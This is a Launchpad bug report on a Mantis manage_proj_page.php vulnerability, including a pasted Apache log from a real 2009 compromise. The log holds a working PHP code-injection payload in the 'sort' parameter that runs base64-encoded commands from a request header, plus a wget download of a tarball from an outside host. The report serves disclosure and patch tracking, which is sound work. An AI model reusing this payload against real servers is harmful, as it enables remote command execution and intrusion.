security issues with manage_proj_page.php
Bug #345988 reported by
Kees Cook
This bug report is a duplicate of:
Bug #481631: mantis1.0.8-4 (ubuntu 8.04) vulnerable to remote exploit.
Edit
Remove
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
mantis (Debian) |
Unknown
|
Unknown
|
|||
mantis (Ubuntu) |
Confirmed
|
Undecided
|
Unassigned |
Bug Description
Binary package hint: mantis
CVE References
visibility: | private → public |
Changed in mantis (Ubuntu): | |
status: | New → Confirmed |
To post a comment you must log in.
This bug has been actively exploited on a hardy machine running mantis 1.0.6 on feb 4th 2009, as it was noticed today.
Because of the LTS for hardy the vendor patch should be applied here too.
<APACHE LOG> 2009:19: 32:48 +0100] "GET /mantis/ manage_ proj_page. php HTTP/1.0" 302 - "-" "-" 2009:19: 32:49 +0100] "POST /mantis/login.php HTTP/1.0" 302 - "-" "-" 2009:19: 32:50 +0100] "GET /mantis/ manage_ proj_page. php?sort= ']);}error_ reporting( 0);print( _code_) ;passthru( base64_ decode( $_SERVER[ HTTP_CMD] ));die 2009:19: 32:53 +0100] "GET /mantis/ manage_ proj_page. php?sort= ']);}error_ reporting( 0);print( _code_) ;passthru( base64_ decode( $_SERVER[ HTTP_CMD] ));die 2009:19: 33:01 +0100] "GET /mantis/ manage_ proj_page. php?sort= ']);}error_ reporting( 0);print( _code_) ;passthru( base64_ decode( $_SERVER[ HTTP_CMD] ));die 2009:19: 33:19 +0100] "GET /mantis/ manage_ proj_page. php?sort= ']);}error_ reporting( 0);print( _code_) ;passthru( base64_ decode( $_SERVER[ HTTP_CMD] ));die www.freewebs. com/spaniola/ new.tgz com|204. 2.183.2| :80... connected.
IP - - [04/Feb/
IP - - [04/Feb/
IP - - [04/Feb/
;%23 HTTP/1.0" 200 3350 "-" "-"
IP - - [04/Feb/
;%23 HTTP/1.0" 200 3218 "-" "-"
IP - - [04/Feb/
;%23 HTTP/1.0" 200 3605 "-" "-"
IP - - [04/Feb/
;%23 HTTP/1.0" 200 3809 "-" "-"
--19:33:01-- http://
=> `new.tgz'
Resolving www.freewebs.com... 204.2.183.2
Connecting to www.freewebs.
HTTP request sent, awaiting response... 200 OK
Length: 248,497 (243K) [application/x-tar]
0K .......... .......... .......... .......... .......... 20% 58.65 KB/s
50K .......... .......... .......... .......... .......... 41% 58.78 KB/s
100K .......... .......... .......... .......... .......... 61% 51.43 KB/s
150K .......... .......... .......... .......... .......... 82% 43.37 KB/s
200K .......... .......... .......... .......... .. 100% 45.68 KB/s
19:33:07 (50.96 KB/s) - `new.tgz' saved [248497/248497]
</APACHE LOG>
The problem seems to be fixed in version 1.1.4.
Intrepid is shipping 1.1.2. Has the vendor patch been applied to that version?